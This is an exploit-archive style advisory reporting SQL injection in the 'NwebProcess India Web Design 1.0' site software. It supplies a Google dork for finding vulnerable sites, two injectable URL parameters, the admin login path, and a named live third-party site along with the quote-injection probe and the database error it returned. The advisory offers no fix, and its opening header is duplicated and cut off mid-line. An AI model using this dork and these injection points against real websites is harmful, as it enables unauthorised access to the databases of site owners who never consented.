##########################################################

# Exploit Title : NwebProcess India Web Design 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# D ##########################################################

# Exploit Title : NwebProcess India Web Design 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepage : nwebprocess.com
# Tested On : Windows
# Exploit Risk : Medium
# Version Information : 1.0
# CWE : CWE-89 [ Improper Neutralization of Special Elements
used in an SQL Command ('SQL Injection') ]
# CxSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018050291

##########################################################

Copyright A(c) 2013 Powered by NWebProcess India SQL Injection Vulnerability

##########################################################

# Google Dork : intext:''Copyright A(c) 2013 Powered by NWebProcess''

# Exploit : /aboutus.php?id=[SQL Injection]
# Exploit : /product.php?cat_id=[SQL Injection]

# Admin Control Panel Login Area Path => /admin/

##########################################################

# Example Site => advanceagencies.in/aboutus.php?id=1%27 =>

[ Proof of Concept for SQL Injection ] => archive.is/YzvPU

# SQL/DB Error appear on the page :

An Internal Error has Occured. Please report following error to the
webmaster.

select * from tbl_content where id='1''

You have an error in your SQL syntax; check the manual that corresponds

to your MySQL server version for the right syntax to use near ''1''' at
line 1'

##########################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

##########################################################